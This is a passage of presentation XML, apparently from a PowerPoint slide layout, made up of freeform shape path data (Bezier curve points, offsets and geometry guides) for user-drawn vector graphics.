                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="11"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="143" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="149"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="155"/>
                      <a:pt x="120" y="159"/>
                      <a:pt x="121" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="178"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="144" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="66"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="102" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="69"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="73"/>
                      <a:pt x="64" y="75"/>
                      <a:pt x="64" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="79"/>
                      <a:pt x="61" y="81"/>
                      <a:pt x="60" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="86"/>
                      <a:pt x="57" y="89"/>
                      <a:pt x="57" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="94"/>
                      <a:pt x="58" y="96"/>
                      <a:pt x="58" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="99"/>
                      <a:pt x="57" y="99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="141"/>
                      <a:pt x="44" y="142"/>
                      <a:pt x="43" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="130"/>
                      <a:pt x="38" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="124"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="141"/>
                      <a:pt x="40" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="146"/>
                      <a:pt x="48" y="150"/>
                      <a:pt x="52" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="157"/>
                      <a:pt x="62" y="161"/>
                      <a:pt x="67" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="167"/>
                      <a:pt x="70" y="169"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="182"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>
                      <a:pt x="68" y="183"/>
                      <a:pt x="68" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="181"/>
                      <a:pt x="71" y="181"/>
                      <a:pt x="72" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="184"/>
                      <a:pt x="76" y="185"/>
                      <a:pt x="79" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="187"/>
                      <a:pt x="91" y="187"/>
                      <a:pt x="97" y="185"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="184"/>
                      <a:pt x="106" y="182"/>
                      <a:pt x="109" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="111" y="177"/>
                      <a:pt x="112" y="175"/>
                      <a:pt x="114" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="117" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="114" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="195"/>
                      <a:pt x="114" y="195"/>
                      <a:pt x="116" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="191"/>
                      <a:pt x="118" y="187"/>
                      <a:pt x="119" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="163"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="156"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="147"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="104"/>
                      <a:pt x="136" y="110"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="117"/>
                      <a:pt x="140" y="124"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="136"/>
                      <a:pt x="136" y="138"/>
                      <a:pt x="132" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="138"/>
                      <a:pt x="128" y="137"/>
                      <a:pt x="128" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="133"/>
                      <a:pt x="127" y="131"/>
                      <a:pt x="127" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="121"/>
                      <a:pt x="126" y="114"/>
                      <a:pt x="124" y="107"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="106" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="62"/>
                      <a:pt x="106" y="60"/>
                      <a:pt x="107" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="56"/>
                      <a:pt x="106" y="54"/>
                      <a:pt x="104" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="45"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="41"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="44"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="46"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="40"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="46"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="72" y="49"/>
                      <a:pt x="72" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="53"/>
                      <a:pt x="66" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="54"/>
                      <a:pt x="65" y="56"/>
                      <a:pt x="64" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="58"/>
                      <a:pt x="64" y="59"/>
                      <a:pt x="65" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="61"/>
                      <a:pt x="67" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="39"/>
                      <a:pt x="98" y="39"/>
                      <a:pt x="97"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408"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3551" y="424"/>
                <a:ext cx="3" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 2"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 1 w 2"/>
                  <a:gd name="T3" fmla="*/ 2 h 2"/>
                  <a:gd name="T4" fmla="*/ 0 w 2"/>
                  <a:gd name="T5" fmla="*/ 2 h 2"/>
                  <a:gd name="T6" fmla="*/ 0 w 2"/>
                  <a:gd name="T7" fmla="*/ 1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2" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="1" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="0" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="0"/>
                      <a:pt x="1"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409"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3564" y="424"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3 w 4"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 4 w 4"/>
                  <a:gd name="T5" fmla="*/ 1 h 1"/>
                  <a:gd name="T6" fmla="*/ 2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2" y="0"/>
                      <a:pt x="2" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3" y="1"/>
                      <a:pt x="4" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="1"/>
                      <a:pt x="3"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Freeform 410"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2004"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7"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411"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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0" y="169"/>
                      <a:pt x="6"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412"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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413"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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414"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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4"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415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
